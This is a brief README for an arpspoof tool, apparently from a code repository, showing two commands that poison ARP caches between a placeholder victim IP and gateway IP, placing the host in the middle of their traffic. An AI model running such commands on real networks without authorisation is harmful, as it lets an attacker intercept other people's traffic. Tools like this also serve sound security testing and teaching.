contrib/arpspoof/README

8 lines
158 B
Plaintext
Raw Normal View History

README for arpspoof
NOTES
Basic spoofing usage:
arpspoof -i ${IFACE} -t ${VICTIM_IP} ${GW_IP} &
arpspoof -i ${IFACE} -t ${GW_IP} ${VICTIM_IP} &